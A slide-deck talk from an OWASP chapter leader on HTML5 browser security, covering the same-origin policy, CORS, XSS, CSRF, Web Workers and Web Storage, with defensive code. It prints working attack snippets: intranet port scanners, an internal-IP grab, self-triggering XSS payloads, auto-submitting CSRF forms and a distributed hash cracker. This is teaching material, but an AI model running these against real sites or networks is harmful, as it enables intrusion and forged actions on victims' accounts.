Everybody loves html5,h4ck3rs too

Posted on 15-Jul-2015


~#Whoami

Nahidul Kibria

Co-Leader, OWASP Bangladesh; Senior Software Engineer, KAZ Software Ltd.

Security enthusiast

Which part do you care about?

Everybody loves HTML5… well

h4ck3rs too… what!!!

What is HTML5

Next major version of HTML.

The Hypertext Markup Language version 5 (HTML5) is the successor of HTML 4.01, XHTML 1.0 and XHTML 1.1

Adds new tags and event handlers to HTML, and much more.

HTML5 is not finished


HTML5 is already here.

HTML5 TEST - http://html5test.com/

Many features are supported by the latest versions of Firefox, Chrome, Safari and Opera.

HTML5 OVERVIEW (standard web model)

• WebSockets

• COR (Cross-Origin Requests)

• Iframe sandboxing

• Web Messaging

WEB BROWSER SECURITY MODELS

• The same origin policy

• The cookie security model

• The Flash security model / sandbox

Same Origin Policy

The same origin policy prevents a document or script loaded from one origin from getting or setting properties of a document from a different origin.

An origin is defined as the combination of

• protocol (scheme),

• host name,

• and port number;

all three must match, so https://bank.com, http://bank.com and https://bank.com:8443 are three different origins.

The Browser “Same Origin” Policy

[Diagram: bank.com and blog.net as two origins; XHR, the document and cookies stay inside their own origin, while TAG loads (script, img) and the JS they carry cross between the two]

What Happens if the Same Origin Policy Is Broken?

Some major HTML5 features

• CORS (Cross-Origin Resource Sharing)

• WebSockets

• Web Workers

• JavaScript APIs

Disclaimer

Today I want to show you how far an attacker can go with simple JavaScript and HTML5, so you can convince your boss to put effort into security measures.

My intention is not to make you panic.

Cross Origin Request (COR)

• Originally Ajax calls were subject to the Same Origin Policy

• Site A cannot make XMLHttpRequests to Site B

• HTML5 makes it possible to make these calls cross-domain

• Site A can now make XMLHttpRequests to Site B as long as Site B allows it.

The response from Site B must include the header:

Access-Control-Allow-Origin: <origin of Site A>

The browser still sends the request; the header only decides whether the calling script is allowed to read the response.

Cross-Origin Resource Sharing

This is the HTML5 counterpart of the Flash policy file crossdomain.xml. There, the over-permissive setting is

<allow-access-from domain="*">

and in CORS the same mistake is Access-Control-Allow-Origin: * (or reflecting whatever Origin the request carried).
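Added example, not code from the talk: how Site B's server side might decide the Access-Control-Allow-Origin header, showing the two weak patterns (reflecting the request Origin, prefix matching) next to an exact allow-list, plus the rule the browser applies before handing the response body to a script. The origins site-a.example and evil.example are assumptions for illustration.

```javascript
// Added example (not from the talk): server-side CORS decision logic and the
// browser-side read check. Origins are constructed for illustration.
const ALLOWED_ORIGINS = new Set(['https://site-a.example']); // "Site A" of the slide

// Weak: whatever Origin the browser sends is echoed back, with credentials
// allowed, so any site can read an authenticated response from Site B.
function corsHeadersReflecting(requestOrigin) {
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Also weak: prefix matching lets attacker-registered names such as
// https://site-a.example.evil.example through.
function corsHeadersPrefixMatch(requestOrigin) {
  if (typeof requestOrigin !== 'string' || !requestOrigin.startsWith('https://site-a.example')) {
    return {};
  }
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Safer: exact-match allow-list. Unknown origins get no CORS headers at all,
// so the browser blocks the cross-origin read. Vary: Origin keeps a shared
// cache from serving one origin's headers to another.
function corsHeadersAllowList(requestOrigin, allowed = ALLOWED_ORIGINS) {
  if (typeof requestOrigin !== 'string' || !allowed.has(requestOrigin)) {
    return {};
  }
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// What the browser does with the response: the calling script only gets the
// body if ACAO matches the page's origin exactly, or is "*", and "*" is never
// accepted for a credentialed (cookie-carrying) request.
function browserAllowsRead(pageOrigin, responseHeaders, withCredentials) {
  const acao = responseHeaders['Access-Control-Allow-Origin'];
  if (acao === undefined) return false;
  if (acao === '*') return !withCredentials;
  if (acao !== pageOrigin) return false;
  return !withCredentials || responseHeaders['Access-Control-Allow-Credentials'] === 'true';
}
```

The attacker's page at https://evil.example makes a credentialed XHR to Site B; with the reflecting or prefix-matching server it can read the victim's data, with the allow-list it cannot. Note that the request itself is sent in every case (which is why CORS does nothing against CSRF); only the read is gated.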

The OWASP Foundation, http://www.owasp.org

Why are programmers happy?

Let's see it from the attacker's view.

XSS (Cross-Site Scripting)

Demo

XSS attack vectors

Impact of XSS

• History stealing

• Intranet hacking

• XSS defacements

• DNS pinning

• IMAP3

• MHTML

• Hacking JSON

• Cookie stealing

• Clipboard stealing

Pr3venting XSS defacements

If you still cannot convince your boss: more evil uses.

"I do not care. Show me how my org is affected."

Attacking the intranet

Obtaining NAT'ed IP addresses

Java applet

If the victim's web browser is Mozilla/Firefox, it is possible to skip the applet: old Firefox builds exposed Java to page script through LiveConnect, so a java.net.Socket can be opened directly from JavaScript. (This path is historical: LiveConnect and Java plugin support have since been removed from every major browser.)

    <script>
    function natIP() {
      var w = window.location;
      // hostname, not host: host includes ":port", which java.net.Socket would not resolve
      var host = w.hostname;
      var port = w.port || 80;
      // Open a Java socket back to the page's own server and ask the JVM which
      // local (internal, NAT'ed) address it bound for that connection.
      var Socket = (new java.net.Socket(host, port)).getLocalAddress().getHostAddress();
      return Socket;
    }
    </script>

Demo

Not only the NAT'ed IP: you can get lots more system info the same way.

Port Scanning

O' Really

Port scanning with script tags: point a <script> at an internal address and look at what the error handler reports.

    <script>
    window.onerror = function (msg) {
      if (!msg.match(/Error loading script/)) {
        // no "Error loading script": the IP does not exist / nothing answered
      } else {
        // a host answered with something that is not JavaScript: found an internal IP
      }
    };
    </script>
    <script src="http://ip/"></script>

Blind Web Server Fingerprinting

Every product ships images at fixed, unique paths; asking for them tells you what is running without ever seeing the response:

Apache web server: /icons/apache_pb.gif

HP printer: /hp/device/hp_invent_logo.gif

<img src="http://intranet_ip/unique_image_url" onload="fingerprint()" onerror="next()" />

onload fires only if that product-specific image exists on the host (device identified); onerror fires when it does not, so the page moves on to the next signature.

HTML5 made it easy

www.andlabs.org/tools/jsrecon.html

Demo

What just happened?

Port Scanning: beating protections

Browsers block a list of well-known ports (example for Firefox, WebSockets and CORS):

➔ http://example.com:22 is refused by the browser

Workaround!

➔ ftp://example.com:22 (a different scheme was not on the block list)

It worked on Internet Explorer, Mozilla Firefox, Google Chrome and Safari.

Detection is based on timeouts, which can be configured.

Caveat: current browsers no longer load ftp: URLs at all (Chrome 88 and Firefox 90 dropped FTP), so this particular bypass is dead, while the port block list itself is still enforced.
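Added example, not the talk's or JSRecon's code: a timing-based intranet port probe in the JSRecon style. It opens a WebSocket to host:port and measures how long readyState stays CONNECTING before dropping to CLOSED; a refused connection closes almost immediately, an open port that speaks HTTP keeps the handshake pending for a while, and a filtered port never closes. The thresholds and the FakeWebSocket stand-in are assumptions so the logic runs offline; in a browser the real WebSocket is used and the timings depend on browser and network.

```javascript
// Added example, not from the talk: timing-based port probe in the style of
// JSRecon. Thresholds and FakeWebSocket are assumptions for illustration.
const CONNECTING = 0;
const CLOSED = 3;
const DEFAULT_THRESHOLDS = { closedMs: 200, filteredMs: 5000 };

// Map "how long did the socket stay CONNECTING" to a port state.
function classifyByTiming(msUntilClosed, t = DEFAULT_THRESHOLDS) {
  if (msUntilClosed === null) return 'filtered';    // never left CONNECTING: packets dropped
  if (msUntilClosed < t.closedMs) return 'closed';  // fast RST from the host
  return 'open';                                     // TCP accepted, handshake failed later
}

// Probe one host:port. In a browser WebSocketImpl is the real WebSocket; it is
// injectable so the same logic can run against the fake below.
function probePort(host, port, opts = {}) {
  const { WebSocketImpl = globalThis.WebSocket, thresholds = DEFAULT_THRESHOLDS, pollMs = 10 } = opts;
  if (typeof WebSocketImpl !== 'function') throw new Error('no WebSocket implementation available');
  return new Promise((resolve) => {
    const start = Date.now();
    let ws;
    try {
      ws = new WebSocketImpl(`ws://${host}:${port}/`);
    } catch (e) {
      // Browsers throw SecurityError for ports on their block-list (22, 25, ...):
      // the "blocking known ports" case from the slide.
      resolve({ host, port, state: 'blocked', elapsedMs: 0 });
      return;
    }
    const timer = setInterval(() => {
      const elapsed = Date.now() - start;
      if (ws.readyState === CLOSED) {
        clearInterval(timer);
        resolve({ host, port, state: classifyByTiming(elapsed, thresholds), elapsedMs: elapsed });
      } else if (elapsed >= thresholds.filteredMs) {
        clearInterval(timer);
        ws.close();
        resolve({ host, port, state: classifyByTiming(null, thresholds), elapsedMs: elapsed });
      }
    }, pollMs);
  });
}

// Scan several ports on one host, one at a time so the timings do not interfere.
async function scanHost(host, ports, opts) {
  const results = [];
  for (const port of ports) results.push(await probePort(host, port, opts));
  return results;
}

// Constructed stand-in for the browser WebSocket: simulates an open port (80),
// a closed port (8080), a filtered port (anything else) and the browser
// block-list (22), so the scanner runs without touching a real network.
class FakeWebSocket {
  constructor(url) {
    const port = Number(/^ws:\/\/[^/:]+:(\d+)\//.exec(url)[1]);
    if (port === 22) throw new Error('SecurityError: port blocked by the browser');
    this.readyState = CONNECTING;
    const closeAfterMs = { 80: 600, 8080: 20 }[port];
    if (closeAfterMs !== undefined) setTimeout(() => { this.readyState = CLOSED; }, closeAfterMs);
  }
  close() { this.readyState = CLOSED; }
}

const FAKE_OPTS = { WebSocketImpl: FakeWebSocket, thresholds: { closedMs: 200, filteredMs: 1200 } };

// Stand-alone run against the fake; 192.168.1.1 is an assumed intranet address.
scanHost('192.168.1.1', [22, 80, 8080, 3389], FAKE_OPTS).then((r) => console.log(r));
```

The same readyState-polling trick works with an XMLHttpRequest whose target has no CORS headers: the request still goes out, the response is discarded, but the time until readyState changes leaks whether anything listened. On a real network the closed/open boundary has to be calibrated per browser (JSRecon's "based on timeouts, it can be configured"), which is why the thresholds are parameters here.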

WTFun

Port Scanning: result (screenshot)

Self-triggering XSS exploits with HTML5

A common XSS occurrence is injection inside some attribute of an INPUT tag. Pre-HTML5 techniques require user interaction to trigger this XSS; in the line below everything after value=" is attacker input:

    <input type="text" value="" onmouseover="alert('Injected val')">

• HTML5 turns this into self-triggering XSS: the autofocus attribute focuses the field as soon as the page loads, which fires onfocus with no user action at all:

    <input type="text" value="" onfocus="alert('Injected value')" autofocus>

Black-list XSS filters

HTML5 introduces many new tags and event handlers (onfocus, autofocus, <video>, <details> and more; see http://html5sec.org), so a black-list written for the HTML4 set of handlers simply does not know them.
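Added example, not code from the talk: a toy black-list filter of the kind the slide criticises, rendered into an input attribute, showing that it stops the old onmouseover payload but lets the HTML5 onfocus/autofocus payload through, and the fix, attribute-value encoding, which keeps any payload inert regardless of handler name. The filter, the payloads and the attribute tokenizer are constructed for illustration.

```javascript
// Added example (not from the talk). Toy black-list of pre-HTML5 handler
// names and the <script> tag: exactly what an HTML4-era filter knows.
const BLACKLIST = [/<script/i, /onmouseover/i, /onclick/i, /onload/i, /javascript:/i];
function blacklistFilter(input) {
  return BLACKLIST.some((re) => re.test(input)) ? '' : input;
}

// The bug: the (filtered) value is placed into an attribute with no encoding.
function renderUnsafe(value) {
  return `<input type="text" value="${blacklistFilter(value)}">`;
}

// The fix: encode every character that can close the attribute or open a tag,
// so the payload stays plain text inside value="...".
function encodeForAttribute(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderSafe(value) {
  return `<input type="text" value="${encodeForAttribute(value)}">`;
}

// Minimal attribute tokenizer for one tag: returns the attribute names a
// browser would see (quoted values are skipped as opaque text).
function attributeNames(tag) {
  const inner = tag.replace(/^<\w+/, '');
  const re = /\s([^\s=>"']+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]*))?/g;
  const names = [];
  let m;
  while ((m = re.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Event-handler attributes that would actually run.
function liveHandlers(html) {
  return attributeNames(html).filter((n) => n.startsWith('on'));
}

// Constructed payloads: the legacy one needs a hover, the HTML5 one fires on load.
const LEGACY_PAYLOAD = '" onmouseover="alert(1)';
const HTML5_PAYLOAD = '" onfocus="alert(1)" autofocus="';
```

Run liveHandlers over renderUnsafe(HTML5_PAYLOAD) and you get ['onfocus']: the black-list passed it, and autofocus makes it self-triggering. renderSafe turns the same payload into value="&quot; onfocus=&quot;alert(1)&quot; autofocus=&quot;" with no live handler, and that holds for any future handler name because the encoding is by context, not by name.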

How does your browser become a proxy for an attacker?

http://erlend.oftedal.no/blog/?blogid=107

CSRF (Cross-Site Request Forgery)

The Sleeping Giant

The victim logs on to bank.com.

Converting POST to GET

Credentials included: [Diagram: a page on blog.net makes the victim's browser request https://bank.com/fn?param=1, and the browser attaches the bank.com session cookie JSESSIONID=AC934234… to that request, exactly as it would for a link the victim clicked]

Cross-Site Request Forgery

[Diagram: an attacker's post at blog.net drives the victim's browser through every step of bank.com's transfer wizard, each step being a request of the form https://bank.com/fn?param=1:

• Go to Transfer Assets

• Select FROM Fund

• Select TO Fund

• Select Dollar Amount

• Submit Transaction

• Confirm Transaction]

Demo

XSS & CSRF: Killer Combo

Programmers prepare, users beware

CSRF form against the Mutillidae training app (it posts a fixed csrf-token value that the app accepts at its lowest security level; the auto-posting trick shown below submits it without a click):

    <form method="POST" name="form0"
      action="http://my.victim.mutillidae:81/mutillidae/index.php?page=add-to-your-blog.php">
      <input type="hidden" name="csrf-token" value="SecurityIsDisabled"/>
      <input type="hidden" name="blog_entry" value="This is come from CSRF"/>
      <input type="hidden" name="add-to-your-blog-php-submit-button" value="Save Blog Entry"/>
    </form>

How Does CSRF Work?

Tags (any of these makes the browser send a GET with the victim's cookies):

    <img src="https://bank.com/fn?param=1">
    <iframe src="https://bank.com/fn?param=1">
    <script src="https://bank.com/fn?param=1">

Autoposting forms (the same for POST, no click needed):

    <body onload="document.forms[0].submit()">
    <form method="POST" action="https://bank.com/fn">
      <input type="hidden" name="sp" value="8109"/>
    </form>

XmlHttpRequest: subject to the same origin policy. Note that a cross-origin XHR is still sent (with cookies, if withCredentials is set); the policy only stops the attacker from reading the response, so it does not prevent the forged action.
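Added example, not code from the talk: the server-side check that defeats the tags and auto-posting form above, a synchronizer token tied to the session plus an Origin/Referer check that fails closed. The request and session objects are plain constructed data standing in for what a web framework would hand you; bank.com and blog.net are the origins from the slides, and the token value is made up.

```javascript
// Added example (not from the talk): CSRF defence on the bank.com side.
// Request/session objects are constructed; a framework would supply them.
const SITE_ORIGIN = 'https://bank.com';                // origin of the application
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);  // must never change state

// Constant-time comparison so the token cannot be guessed byte by byte.
function tokensEqual(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string' || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Where did the browser say this request came from? Origin first, then the
// Referer's origin; null when neither is present or the Referer is garbage.
function requestOrigin(headers) {
  if (headers['origin']) return headers['origin'];
  if (headers['referer']) {
    try { return new URL(headers['referer']).origin; } catch (e) { return null; }
  }
  return null;
}

// Synchronizer-token check. Returns a reason so the caller can log rejections.
function csrfCheck(req, session) {
  if (SAFE_METHODS.has(req.method)) return { ok: true, reason: 'safe method' };
  const origin = requestOrigin(req.headers);
  if (origin !== SITE_ORIGIN) {
    // fail closed: a missing Origin/Referer is treated like a foreign one
    return { ok: false, reason: `origin ${origin} is not ${SITE_ORIGIN}` };
  }
  const submitted = req.body ? req.body['csrf-token'] : undefined;
  if (!tokensEqual(submitted, session.csrfToken)) {
    return { ok: false, reason: 'csrf-token missing or wrong' };
  }
  return { ok: true, reason: 'origin and token valid' };
}

// Constructed session and requests: the auto-posting form from blog.net, a
// legitimate submission from bank.com's own transfer page, and a token guess.
const SESSION = { csrfToken: 'a1b2c3d4e5f6a7b8' };
const FORGED = { method: 'POST', headers: { origin: 'https://blog.net' },
  body: { 'csrf-token': 'SecurityIsDisabled', sp: '8109' } };
const LEGIT = { method: 'POST', headers: { referer: 'https://bank.com/transfer' },
  body: { 'csrf-token': 'a1b2c3d4e5f6a7b8', sp: '8109' } };
const GUESS = { method: 'POST', headers: { origin: 'https://bank.com' },
  body: { 'csrf-token': 'a1b2c3d4e5f6a7b9' } };
```

Two points the code makes explicit. First, the whole scheme assumes GET never changes state: the slide's https://bank.com/fn?param=1 loaded from an <img> passes csrfCheck because GET is a safe method, so "Converting POST to GET" is a bug on the server, not something the check can catch. Second, the token comparison happens only after the origin check, so an attacker who already has the token (the XSS & CSRF combo) still has to send the request from bank.com itself.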

What Can Attackers Do with CSRF?

Anything an authenticated user can do:

• Click links

• Fill out and submit forms

• Follow all the steps of a wizard interface

Using CSRF to Attack Internal Pages

[Diagram: attacker.com serves a TAG; the victim's internal browser loads it and so sends the CSRF request to internal.mybank.com, an internal site the attacker cannot reach directly; the request is allowed because it comes from inside]

Web Workers

Web Workers provide the possibility for JavaScript to run in the background, in a thread separate from the page.

Web Workers alone are not a security issue.

But they can be used indirectly for launching work-intensive attacks (hash cracking, request floods) without the user noticing, because the page itself stays responsive.

Ravan, a JavaScript distributed hash cracker built on Web Workers: http://www.andlabs.org/tools/ravan.html
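Added example, not Ravan's code: how a hash-cracking job is split across background workers, which is the structure behind the "cracking hashes in a JS cloud" and "web-based botnet" points of the summary. The keyspace is indexed so each worker only needs a [from, to) range, the worker body is the function a `new Worker(...)` would run on a posted job, and the coordinator is the page-side script. FNV-1a is a constructed stand-in for a real hash so the example runs offline; the charset, length and target are assumptions.

```javascript
// Added example (not Ravan's code): distributing a brute-force search the way
// a Web Worker based cracker does. FNV-1a and the target are stand-ins.
const CHARSET = 'abcdefghijklmnopqrstuvwxyz';

// 32-bit FNV-1a; a demo hash only, not something anyone would crack for real.
function fnv1a(str) {
  let h = 0x811c9dc5;
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h;
}

// Index -> candidate string (mixed radix), so a worker needs only its range.
function candidateAt(index, length, charset = CHARSET) {
  let s = '';
  for (let i = 0; i < length; i++) {
    s = charset[index % charset.length] + s;
    index = Math.floor(index / charset.length);
  }
  return s;
}

// Split the keyspace of `length`-char strings into n near-equal ranges.
function partitionKeyspace(length, n, charset = CHARSET) {
  const total = charset.length ** length;
  const per = Math.ceil(total / n);
  const parts = [];
  for (let from = 0; from < total; from += per) parts.push({ from, to: Math.min(from + per, total) });
  return parts;
}

// Body of one worker. In a browser this is the code inside the Worker script:
// it receives {target, from, to, length} via onmessage and posts the result
// back; here it is a plain function so it can run in-process.
function crackRange({ target, from, to, length }) {
  for (let i = from; i < to; i++) {
    const candidate = candidateAt(i, length);
    if (fnv1a(candidate) === target) return { found: candidate, checked: i - from + 1 };
  }
  return { found: null, checked: to - from };
}

// Coordinator (page-side script). `run` is the hook that would wrap
// `new Worker(...)` + postMessage and resolve on the reply; by default it
// just calls crackRange so the example is self-contained.
async function crackDistributed(target, length, nWorkers, run = async (job) => crackRange(job)) {
  const jobs = partitionKeyspace(length, nWorkers).map((p) => ({ target, length, ...p }));
  const results = await Promise.all(jobs.map((job) => run(job)));
  const hit = results.find((r) => r.found !== null);
  return {
    found: hit ? hit.found : null,
    checked: results.reduce((sum, r) => sum + r.checked, 0),
  };
}

// Stand-alone run: 8 "workers" over all 4-letter lowercase strings (assumed target).
const TARGET = fnv1a('cors');
crackDistributed(TARGET, 4, 8).then((r) => console.log(r));
```

The page that embeds this never blocks: each range runs off the main thread, and the only thing the victim might notice is fan noise. Swap `run` for a function that posts the job to a Worker (or, in the botnet variant, over a WebSocket to a browser that volunteered by merely visiting a page) and the coordinator is unchanged.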

Web Storage

Web Storage vulnerabilities & threats

Session hijacking

• If the session identifier is stored in local storage, it can be stolen with JavaScript (any XSS on the origin reads it).

• There is no HttpOnly flag for Web Storage, unlike cookies.

Disclosure of confidential data

• If sensitive data is stored in local storage, it can be stolen with JavaScript.

User tracking

• An additional possibility to identify a user.

Persistent attack vectors

• An attacker can store a payload persistently in the user's browser; if the application reads stored data back into the page without encoding, the attack re-runs on every visit.

Offline Web Applications

Cache poisoning

• Caching of the root directory is possible.

• Both HTTP and HTTPS responses can be cached.

An attacker who can inject a cache manifest once (for example from a hostile network) keeps a poisoned copy of the page in the browser until the manifest changes. (Application Cache has since been removed from the major browsers in favour of Service Workers, which are restricted to HTTPS.)

OK, enough. Just tell me: can an attacker get a remote (control) shell on my PC??

Infection method known as drive-by download

In summary

Web Worker = cracking hashes in a JS cloud

Web Worker + Cross-Origin Resource Sharing = powerful DDoS attacks

Web Worker + Cross-Origin Resource Sharing + WebSocket = web-based botnet

Is HTML5 hopelessly (in)secure?

Ahem, no. Security has been a major consideration in the design of the specification. But it is incredibly hard to add features to any technology without increasing the possibility of abuse.

References

• Compass Security AG, HTML5 Web Security (v1): http://userguidepdf.info/html5-web-security-v1.html

• HTML5 Security Cheatsheet: http://html5sec.org

• OWASP HTML5 Security Cheat Sheet: https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet

• W3C HTML5 specification: http://dev.w3.org/html5/spec/Overview.html

Twitter: @nahidupa

Be secure & safe

HTML5 makes everybody happy, including h4ck3rs, and keeps security professionals busy.